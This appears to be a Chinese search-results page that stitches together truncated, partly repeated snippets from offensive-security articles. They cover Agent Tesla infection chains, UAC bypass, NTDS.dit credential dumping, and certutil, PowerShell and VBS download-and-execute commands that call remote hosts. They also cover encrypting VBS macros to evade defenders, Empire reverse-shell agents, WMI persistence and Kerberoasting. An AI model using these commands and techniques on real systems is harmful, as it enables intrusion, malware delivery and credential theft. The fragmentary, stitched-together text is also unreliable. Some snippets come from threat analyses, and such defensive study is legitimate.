分析 嵌入的 lnk 文件被混淆,去混淆后我们可以看到它使用 cmd.exe 调用 PowerShell 从 Github 帐户(lib7.ps1)下载并执行攻击的第一阶段。...该技术背后的代码与Metasploit 框架的模块实现相同。...解密命令后,我们可以看到UAC绕过的过程,包括在Task Scheduler中创建一个SilentCleanup任务,调用PowerShell以更高的权限执行创建的vbs文件。...此阶段执行以下操作: 在ProgramFiles 目录中创建一个 vbs 文件 (cu.vbs), 并通过将此 vbs 文件添加到HKLM\Software\Microsoft\Windows\CurrentVersion...使用“Attrib.exe +h”命令隐藏 vbs 文件。 使用 PowerShell下载并执行最后阶段 ( updater.ps1 )。
【执行混淆代码】 【通过 MSHTA 执行远程服务器上的 HTA 文件】 HTA 文件包含多个千余行的垃圾 VBS 函数,其中只有一个与恶意行为有关。...【执行新的 PowerShell 代码】 IEX 函数执行 AES 解密与 GZIP 解压是关键的 PowerShell 代码: 从远程服务器下载 Agent Tesla 的 Payload 执行...通过将整数转换为字符然后替换空格并进一步利用 MSHTA 从远程 URL 执行 HTA 文件,如下所示。...【通过 LNK 执行 HTA 文件】 MSHTA 执行的 HTA 文件与之前感染链中使用的文件相同,加密数组转换为字符以形成可通过 Run 方法执行的 PowerShell 代码。...() 执行代码】 下载落地后,使用 Start-Process() 从 AppData 路径执行 Agent Tesla。
或者,可以通过加载PowerShell扩展来从现有的Meterpreter会话执行脚本。...或者,可以通过加载PowerShell扩展来从现有的Meterpreter会话执行它。...然后,解压缩的文件可以从域控制器传输到另一个Windows系统,以转储域密码哈希值。...cscript vssown.vbs /start cscript vssown.vbs /create c cscript vssown.vbs /list cscript vssown.vbs /delete...此外,impacket可以通过使用hash传递从远程主机上转储域密码哈希NTDS.DIT文件。
,使用debug功能将hex代码还原出exe文件。...Debug它还有一个功能可以将十六进制代码转换为可执行文件: 实际测试利用kali中的exe2hex.exe exe2hex -x demo.exe [*] exe2hex v1.5.1 [i] Outputting...描述:您永远都不知道VBS强大,话说MYSQL作者写的第一行代码就是采用VBS写的; downloader使用msxml2.xmlhttp和adodb.stream对象统统联合 #按顺序依次执行后会生成...中的利用测试系统安装Office软件,下载执行dll对应的powershell代码如下: $path="D:\test\msg1.dll" certutil.exe -urlcache -split...来实现解压缩zip文件 vbs实现解压缩,以下代码保存为.vbs文件: UnZip "C:\test\update\wget.zip","C:\test\update\wget\" Sub UnZip
简介 在各种钓鱼、挖矿、勒索、组建僵尸网络、基础渗透、后渗透过程当中,攻击者都会通过一些方法去下载执行恶意代码并执行完成攻击操作,比如前段时间通过Office DDE执行powershell的,利用宏执行...reverse-tcp.xyz/test.jpg -O test.jpg) 当然也可以从UVC读取 powershell -exec bypass -f \\webdavserver\folder...可以使用Certutil转储并显示证书颁发机构(CA)配置信息、配置证书服务、备份和恢复CA组件,并验证证书、密钥对和证书链。...代码并执行这些代码。.../winrm.vbs 和Pubprn.vbs类似,不过它需要配合注册表,其中用到CreateObject()实例化 Scripting.Dictionary存在劫持后导致代码执行 cscript
通过shell向靶机写入VBS代码: ?...详细代码如下: echo Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbs echo Set Shell = CreateObject("...Part.3 Powershell Powershell Powershell在windows server 2003以后版本的操作系统中默认是自带的,我们也可以用它来进行文件下载。...powershell -exec bypass -c (New-Object System.Net.WebClient).DownloadFile('http://192.168.3.1/hash.exe...Part.5 certutil certutil Windows有一个名为CertUtil的内置程序,可用于在Windows中管理证书,CertUtil的一个特性是能够从远程URL下载证书或任何其他文件
简介 在各种钓鱼、挖矿、勒索、组建僵尸网络、基础渗透、后渗透过程当中,攻击者都会通过一些方法去下载执行恶意代码并执行完成攻击操作,比如前段时间通过Office DDE执行powershell.../test.jpg -O test.jpg) 当然也可以从UVC读取 powershell -exec bypass -f \\webdavserver\folder\payload.ps1...可以使用Certutil转储并显示证书颁发机构(CA)配置信息、配置证书服务、备份和恢复CA组件,并验证证书、密钥对和证书链。...代码并执行这些代码。.../winrm.vbs 和Pubprn.vbs类似,不过它需要配合注册表,其中用到CreateObject()实例化 Scripting.Dictionary存在劫持后导致代码执行 cscript
代码首先检查是否能够联网,接着下载并执行 Payload(3cc322e6044691b7b2ce8937d90dccf0cb6b6692cbee40742356777762c2cc71)。...daolnwod/moc.evil.evirdeno//:ptth''(eliFda';c3,we22 -Join '';IEX(([regex]::Matches(env:temp+ '\twt.vbs...') 第一阶段的 Payload 会加载下一阶段的 Payload,脚本使用了较为简单的方法(字符转十六进制)来隐藏下一阶段的恶意 URL。...△ tvt.vbs △ 第二阶段 第二阶段的 Payload 是 PowerShell 脚本: △ PowerShell 脚本 攻击链的最后是一个 .js 脚本( ef3e6b1fb39341321591d2df51a29ff0365d5e997bcb7a10f4f1fbcd1a8468dd...下图可见,代码中增加了许多垃圾内容进行混淆,在运行时用零替换不必要的字符串再启动动态链接库。
Vbs是Windows上的可执行文件,可以直接运行Windows的操作命令,但是vbs在渗透测试或者钓鱼中有个比较大的缺点,就是代码明文。...受害者或者蓝队可以直接阅读VBS的代码,可以很容易直接找出cs会连地址(Emmm至少在我本次使用的这个脚本里是这样),所以我们必须对VBS脚本进行加密,加密的工具为微软官方给出的加密软件screnc.exe...这个工具已经写进打包好的工具里,程序运行时会在C盘根目录下自动释放,程序自动生成VBS代码,对VBS文件进行加密,程序运行完成后会被删除。...工具特点: 本次使用的是VBS调用powershell执行命令的方式进行上线,程序执行成功后会在系统内存运行,不产生exe等可执行文件后台进程,减少被查杀的风险;而且当excel程序被受害者关闭后,仍然可以正常上线...从https://github.com/PDWR/3vilMacro/releases下载3vilMacro.exe文件。
/portmap -m 2 -p1 1234 -p2 2333 将目标的3389转发到本地的1234端口 ....----------------------------------------------------- CENTOSO The command completed successfully. 3、从计算机名获取...p=981 内网文件传输 windows下文件传输 1、powershell文件下载 powershell突破限制执行:powershell -ExecutionPolicy Bypass -File...Microsoft.NET\Framework\的各种版本之下 csc.exe /out:C:\evil\evil.exe C:\evil\evil.cs 3、debug程序 hex功能能将hex文件转换为...=,没找到和QuarkPwDump那个修改版的区别 获取ntds.dit和system.hiv之后(不用利用那个vbs导出,好像并不能分析出来) 利用powershell(DSInternals)分析
/portmap -m 2 -p1 1234 -p2 2333 将目标的3389转发到本地的1234端口 ....----------------------------------------------------- CENTOSO The command completed successfully. 3、从计算机名获取...p=981 内网文件传输 windows下文件传输 1、powershell文件下载 powershell突破限制执行:powershell -ExecutionPolicy Bypass -File...3、debug程序 hex功能能将hex文件转换为exe文件(win08_x64没有这个,win03_x32有,听说是x32才有这个) ?...思路: 把需要上传的exe转换成十六进制hex的形式 通过echo命令将hex代码写入文件(echo也是有长度限制的) 使用debug功能将hex代码还原出exe文件 ?
/portmap -m 2 -p1 1234 -p2 2333 将目标的3389转发到本地的1234端口 ....----------------------------------------------------- CENTOSO The command completed successfully. 3、从计算机名获取...p=981 ###内网文件传输 #####windows下文件传输 1、powershell文件下载 powershell突破限制执行:powershell -ExecutionPolicy Bypass...Microsoft.NET\Framework\的各种版本之下 csc.exe /out:C:\evil\evil.exe C:\evil\evil.cs 3、debug程序 hex功能能将hex文件转换为...=,没找到和QuarkPwDump那个修改版的区别 获取ntds.dit和system.hiv之后(不用利用那个vbs导出,好像并不能分析出来 #####利用powershell(DSInternals
在PowerShell方面,帝国实现了无需powershell.exe即可运行PowerShell代理的功能,可快速部署的开发后的模块从按键记录到Mimikatz,可逃避网络检测的能力,适应性强的通信,...生成的文件类型有.dll,bat,vbs等。 ?...3.vbs反弹shell代理 ? 由于之已经设置过了这里只需填写之前监听的名字,execute 执行完了之后会在Empire搭建的服务器上的/tmp/生成个vbs的木马 ? ?...编码过的攻击代码写入到本地安装的httpd默认安装/var/www/html/demo.ps1路径下 ?...、剪贴板记录等 credentials #密码凭据的获取和转储 exfiltration #指定ip进行端口扫描 lateral_movement #横向渗透模块
PowerShell File Download PowerShell 是一种winodws原生的脚本语言,对于熟练使用它的人来说,可以实现很多复杂的功能。...下面这两条指令实现了从Internet网络下载一个文件。...下面的代码可以实现下载文件,虽然它的长度比Powershell长多了。...可以修改其中的代码,达到自己想要的目的,然后编译成exe文件。...可以使用Certutil.exe转储和显示证书颁发机构(CA)配置信息,配置证书服务,备份和还原CA组件,以及验证证书,密钥对和证书链。
0x03 落地测试 开始我们是想直接写一个vbs下载者脚本远程下载一个免杀木马,或者是将免杀木马转为base64/hex编码后写入再使用certutil命令解码落地文件,最后执行上线。...\" 文件虽然写进去了,但在执行vbs下载者时被360拦截查杀了,而且也不能使用certitil命令解码,360也会拦截-decode、-decodehex,果断放弃了这两种方法,如下图所示。...这里我也尝试了下将脚本中的危险组件通过混淆来免杀,结果还是不行,大家可以自己去尝试下免杀这个脚本,或者找其他同类型的免杀vbs脚本,在这种场景下还是可以利用的。...或ReadAsByteArrayAsync方法读取文件内容); scriptblock类的Create方法将$content变量内容创建为一个代码块,Invoke方法执行代码块中的Powershell脚本或者命令...\\192.168.1.110\\FileShare\\artifact.exe (2) 或者我们也执行相关命令将SAM、SYSTEM或者lsass.exe进程的转储文件导出到匿名共享目录,然后再脱到我们本地用
powershell_import /root/Desktop/GetUserSPNs.ps1 ? 还有一个VBS脚本也是该工具的一部分,可以为我们提供相同的信息。...该脚本可以通过使用本机Windows二进制cscript从Windows命令提示符执行。 cscript.exe GetUserSPNs.vbs ?...PowerShell AD Recon 除了Tim Medin开发的工具外,Sean Metcalf也开发了各种PowerShell脚本来执行Kerberos侦察。...其中一些需要PowerShell v2.0的环境,还有一些则需要PowerShell v3.0环境。 Get-SPN -type service -search "*" ?...结果我们也可以将其转换为表格的形式,以便于我们的浏览。 Get-SPN -type service -search "*" -List yes | Format-Table ?
从红队的角度来看,WMI 可用于执行多种活动,例如横向移动、持久性、态势感知、代码执行以及作为命令和控制(C2)。...然而,各种框架,如 Metasploit、Empire、PoshC2、PowerSploit 和多个 PowerShell 脚本和 C# 工具可用于自动化此技术,为代码执行提供不同的触发器和各种选项。...WMI-Persistence是另一个 PowerShell 脚本,它可以创建事件过滤器,在每次重新启动后 5 分钟内从远程位置执行基于 PowerShell 的有效负载。...(.NET 框架的一部分)可以编译源代码,以便将其转换为可执行文件。...默认情况下,此工具使用记事本,这是一个常见的 Windows 应用程序,但可以修改代码以针对任何其他常见进程,例如 word.exe、outlook.exe、excel.exe、calc.exe,具体取决于从主机收集的信息在态势感知期间
攻击通常从向一个或多个用户发送鱼叉式网络钓鱼电子邮件开始,使攻击者能够让他们的代码在目标网络内的计算机上运行。...其他文件类型也可能具有嵌入式密码(通常为明文),例如 vbs 和 bat。...凭证盗窃洗牌 我将此部分称为“凭据盗窃洗牌”(或“凭据洗牌”),因为很难简单地封装此活动。把它想象成一种舞蹈。破坏单个工作站、提升权限和转储凭据。...将此值设置为“True”将从涉及此系统的任何 WinRM 连接中删除加密,包括 PowerShell 远程处理。...截至 2015 年 10 月,还有一种Windows 方法利用 PowerShell 方法从 NTDS.dit 文件(和注册表系统配置单元)转储凭据,称为来自 DSInternals.com 的 Get-ADDBAccount
前言 在Freebuf上许多同学已经对HID攻击谈了自己的看法,如维克斯同学的《利用Arduino快速制作Teensy BadUSB》无论从科普还是实践都给我们详尽的描述了BadUSB制作的相关过程,lpcdma...$url= 'http://127.0.0.1/PUTTY.EXE';$file = ' D:\\x.exe ';$clnt.DownloadFile($url,$file); 这个命令的意思大体是从服务器...,打包压缩,并在检测到有U盘插入时将文件传入U盘,此VBS代码在后台运行,等待时机,先用Arduino Leanardo传入代码,再用另一个U盘取出文件。...vbs代码实现如下,主要功能是通过模糊查询找到想要的文件,放到D:\fn(fileneeded)文件夹下,压缩后删除原文件并等待U盘插入,插入后将fn.rar传入U盘并删除目标电脑中的fn.rar和VBS...不过当今各种杀软对VBS脚本是严防死守,很多正常功能都报毒,没有高超的VBS免杀技术恐怕是难以完成了。
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
腾讯会议
云直播
对象存储
